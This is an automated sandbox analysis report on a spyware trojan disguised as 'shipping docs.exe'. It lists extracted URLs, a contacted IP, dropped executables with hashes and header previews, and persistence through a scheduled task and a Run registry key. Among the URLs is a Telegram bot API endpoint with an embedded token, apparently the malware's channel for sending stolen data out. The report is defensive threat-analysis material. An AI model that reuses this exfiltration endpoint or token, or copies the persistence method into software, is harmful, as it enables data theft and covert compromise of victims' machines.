https://api.telegram.org/bot5676971476:AAFdGsXW8kwzXNIluAGV-a4sJ2XBy68O9WI/1644584536%discordapi%yyy	VMqTMMD.exe, 00000015.00000002.518773451.0000000002E61000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sajatypeworks.comteP$	shipping docs.exe, 00000000.00000003.239908062.0000000005493000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240179699.0000000005493000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240220486.0000000005493000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.239881609.0000000005491000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240113755.0000000005493000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://www.sajatypeworks.com	shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240049534.0000000005494000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.239908062.0000000005493000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240150934.0000000005494000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240179699.0000000005493000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240220486.0000000005493000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.239973997.0000000005494000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240136652.0000000005494000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.239881609.0000000005491000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.239942097.0000000005494000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240113755.0000000005493000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240076834.0000000005494000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.typography.netD	shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://JIQ1JKgQReGyOBe.com	VMqTMMD.exe, 00000015.00000002.533512375.00000000031B2000.00000004.00000800.00020000.00000000.sdmp, VMqTMMD.exe, 00000015.00000002.518773451.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, VMqTMMD.exe, 00000015.00000002.534481256.00000000031E8000.00000004.00000800.00020000.00000000.sdmp, VMqTMMD.exe, 00000015.00000002.534906198.0000000003201000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.founder.com.cn/cn/cThe	shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sandoll.co.krigh	shipping docs.exe, 00000000.00000003.241289310.0000000005479000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot5676971476:AAFdGsXW8kwzXNIluAGV-a4sJ2XBy68O9WI/	shipping docs.exe, 00000003.00000002.518422910.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, yVGAJfiVEvtg.exe, 00000012.00000002.520653491.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, VMqTMMD.exe, 00000015.00000002.518773451.0000000002E61000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.galapagosdesign.com/staff/dennis.htm	shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://fontfabrik.com	shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240423951.000000000548B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.comgrita	shipping docs.exe, 00000000.00000003.264268952.0000000005470000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org4	shipping docs.exe, 00000003.00000002.534292549.0000000003336000.00000004.00000800.00020000.00000000.sdmp, yVGAJfiVEvtg.exe, 00000012.00000002.537543749.000000000349A000.00000004.00000800.00020000.00000000.sdmp, VMqTMMD.exe, 00000015.00000002.534577687.00000000031EE000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://Unbjpy.com	VMqTMMD.exe, 00000015.00000002.518773451.0000000002E61000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sandoll.co.krT	shipping docs.exe, 00000000.00000003.241289310.0000000005479000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://DynDns.comDynDNSnamejidpasswordPsi/Psi	VMqTMMD.exe, 00000015.00000002.518773451.0000000002E61000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fonts.comtteJ	shipping docs.exe, 00000000.00000003.240136652.0000000005494000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.galapagosdesign.com/DPlease	shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/jp/O	shipping docs.exe, 00000000.00000003.243601775.0000000005474000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fonts.com	shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240126460.000000000548B000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240159233.000000000548B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sandoll.co.kr	shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.urwpp.deDPlease	shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/$	shipping docs.exe, 00000000.00000003.243601775.0000000005474000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	shipping docs.exe, 00000000.00000002.265489624.0000000002481000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000003.00000002.534292549.0000000003336000.00000004.00000800.00020000.00000000.sdmp, yVGAJfiVEvtg.exe, 00000004.00000002.364468167.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, VMqTMMD.exe, 0000000F.00000002.373989607.0000000002D06000.00000004.00000800.00020000.00000000.sdmp, yVGAJfiVEvtg.exe, 00000012.00000002.537543749.000000000349A000.00000004.00000800.00020000.00000000.sdmp, VMqTMMD.exe, 00000015.00000002.534577687.00000000031EE000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sakkal.com	shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/Y	shipping docs.exe, 00000000.00000003.243601775.0000000005474000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0	shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com	shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www	shipping docs.exe, 00000003.00000002.518422910.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, yVGAJfiVEvtg.exe, 00000012.00000002.520653491.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, VMqTMMD.exe, 00000015.00000002.518773451.0000000002E61000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/jp/	shipping docs.exe, 00000000.00000003.243601775.0000000005474000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://en.w	shipping docs.exe, 00000000.00000003.239628147.0000000000BDD000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/=	shipping docs.exe, 00000000.00000003.243601775.0000000005474000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/ko	shipping docs.exe, 00000000.00000003.243601775.0000000005474000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.carterandcone.coml	shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn/	shipping docs.exe, 00000000.00000003.242044098.0000000005474000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn	shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.241799498.00000000054AD000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.241823423.0000000005474000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.242049495.0000000005479000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers-	shipping docs.exe, 00000000.00000003.245303030.0000000005479000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers/frere-jones.html	shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.comm	shipping docs.exe, 00000000.00000003.264268952.0000000005470000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/	shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.243601775.0000000005474000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmp	false		high
http://api.telegram.org	shipping docs.exe, 00000003.00000002.534617829.000000000334B000.00000004.00000800.00020000.00000000.sdmp, yVGAJfiVEvtg.exe, 00000012.00000002.537871887.00000000034AF000.00000004.00000800.00020000.00000000.sdmp, VMqTMMD.exe, 00000015.00000002.534906198.0000000003201000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cnu-h	shipping docs.exe, 00000000.00000003.241799498.00000000054AD000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fonts.com8	shipping docs.exe, 00000000.00000003.240136652.0000000005494000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240113755.0000000005493000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn%	shipping docs.exe, 00000000.00000003.241799498.00000000054AD000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cnlJ	shipping docs.exe, 00000000.00000003.241823423.0000000005474000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.242158018.000000000547B000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.242049495.0000000005479000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom		62041	TELEGRAMRU	false

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	756232
Start date and time:	2022-11-29 21:18:08 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 43s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	shipping docs.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	24
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@19/9@3/2
EGA Information:	Successful, ratio: 100%
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 209.197.3.8
Excluded domains from analysis (whitelisted): fs.microsoft.com, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, wu-bg-shim.trafficmanager.net
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
21:19:06	API Interceptor	602x Sleep call for process: shipping docs.exe modified
21:19:09	Task Scheduler	Run new task: yVGAJfiVEvtg path: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe
21:19:18	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run VMqTMMD C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe
21:19:26	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run VMqTMMD C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe
21:19:28	API Interceptor	113x Sleep call for process: yVGAJfiVEvtg.exe modified
21:19:41	API Interceptor	193x Sleep call for process: VMqTMMD.exe modified

Process:	C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.355304211458859
Encrypted:	false
SSDEEP:	24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
MD5:	69206D3AF7D6EFD08F4B4726998856D3
SHA1:	E778D4BF781F7712163CF5E2F5E7C15953E484CF
SHA-256:	A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
SHA-512:	CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\shipping docs.exe.log

Download File

Process:	C:\Users\user\Desktop\shipping docs.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.355304211458859
Encrypted:	false
SSDEEP:	24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
MD5:	69206D3AF7D6EFD08F4B4726998856D3
SHA1:	E778D4BF781F7712163CF5E2F5E7C15953E484CF
SHA-256:	A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
SHA-512:	CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\yVGAJfiVEvtg.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.355304211458859
Encrypted:	false
SSDEEP:	24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
MD5:	69206D3AF7D6EFD08F4B4726998856D3
SHA1:	E778D4BF781F7712163CF5E2F5E7C15953E484CF
SHA-256:	A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
SHA-512:	CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

C:\Users\user\AppData\Local\Temp\tmp3418.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1645
Entropy (8bit):	5.196605565254392
Encrypted:	false
SSDEEP:	24:2dH4+SEqC/Q7hxlNMFp1/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBx3tn:cbh47TlNQ//rydbz9I3YODOLNdq3jd
MD5:	FD5E93C3EBB783A2036F64992EA982BD
SHA1:	3D41B17EFE57C343E7C40FAD2F14EFEA143CB502
SHA-256:	9BD161BA3D8CD57B581AF3CB7879BCC2FE34A62E2C3BCF3B8CEA9E3FAD9DDCE2
SHA-512:	0707F1A58755FD8E38E22E5352C84FFE372C7F621A3EE48EE389AD5AC35F6AAE64696F59F032148D5B31913100A093777DA331B59FDE3ACA82B3E1549145E70C
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true

C:\Users\user\AppData\Local\Temp\tmp7934.tmp

Download File

Process:	C:\Users\user\Desktop\shipping docs.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1645
Entropy (8bit):	5.196605565254392
Encrypted:	false
SSDEEP:	24:2dH4+SEqC/Q7hxlNMFp1/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBx3tn:cbh47TlNQ//rydbz9I3YODOLNdq3jd
MD5:	FD5E93C3EBB783A2036F64992EA982BD
SHA1:	3D41B17EFE57C343E7C40FAD2F14EFEA143CB502
SHA-256:	9BD161BA3D8CD57B581AF3CB7879BCC2FE34A62E2C3BCF3B8CEA9E3FAD9DDCE2
SHA-512:	0707F1A58755FD8E38E22E5352C84FFE372C7F621A3EE48EE389AD5AC35F6AAE64696F59F032148D5B31913100A093777DA331B59FDE3ACA82B3E1549145E70C
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true

C:\Users\user\AppData\Local\Temp\tmpF5B7.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1645
Entropy (8bit):	5.196605565254392
Encrypted:	false
SSDEEP:	24:2dH4+SEqC/Q7hxlNMFp1/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBx3tn:cbh47TlNQ//rydbz9I3YODOLNdq3jd
MD5:	FD5E93C3EBB783A2036F64992EA982BD
SHA1:	3D41B17EFE57C343E7C40FAD2F14EFEA143CB502
SHA-256:	9BD161BA3D8CD57B581AF3CB7879BCC2FE34A62E2C3BCF3B8CEA9E3FAD9DDCE2
SHA-512:	0707F1A58755FD8E38E22E5352C84FFE372C7F621A3EE48EE389AD5AC35F6AAE64696F59F032148D5B31913100A093777DA331B59FDE3ACA82B3E1549145E70C
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true

C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe

Download File

Process:	C:\Users\user\Desktop\shipping docs.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	606720
Entropy (8bit):	7.88879203859592
Encrypted:	false
SSDEEP:	12288:ks2kzrbETClbHskFgFwIyXCDl+s30ki9Pi00uSGD6DWzEH:1176ChskFgqIyXoi9Pi00uSTHH
MD5:	6308AE755A893C15A989B1CCF2C56393
SHA1:	00ADA70AA14A5CF26A7F8CECBAAA437267D30A2A
SHA-256:	9DFDB5048599B1083FE534CF5FE5A0440D71EB74B5497E506F0A0A4C23821F40
SHA-512:	E03EAC82BF4174912D63CB8ECEED393320FE957F7A735FF0F720FBF558F9638E6FC051CB80607864CAAA8366CA0EDC2D44028367EF97D8020AD7B6F45EADDCD3
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 73%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....U.c.................0...........N... ...`....@.. ....................................@..................................N..W....`.. ............................................................................ ............... ..H............text........ ...0.................. ..`.rsrc... ....`.......2..............@..@.reloc...............@..............@..B.................N......H............U......4...X...(^..........................................z.(......}.....( ...o!...}......0...........{............3.....(.......................0...........{......,....f.........}......}......}.......s....o....}.......}....8......{....o....}......{....}......}.............}.....{........Y}.....{....-...+H.{........{....X.{....X .;.\|.{....Xa}......}.....{....o....:q....(....+..(........}.........(......................n..}.....{....,..{....o......{....*.s".

C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\shipping docs.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe

Download File

Process:	C:\Users\user\Desktop\shipping docs.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	606720
Entropy (8bit):	7.88879203859592
Encrypted:	false
SSDEEP:	12288:ks2kzrbETClbHskFgFwIyXCDl+s30ki9Pi00uSGD6DWzEH:1176ChskFgqIyXoi9Pi00uSTHH
MD5:	6308AE755A893C15A989B1CCF2C56393
SHA1:	00ADA70AA14A5CF26A7F8CECBAAA437267D30A2A
SHA-256:	9DFDB5048599B1083FE534CF5FE5A0440D71EB74B5497E506F0A0A4C23821F40
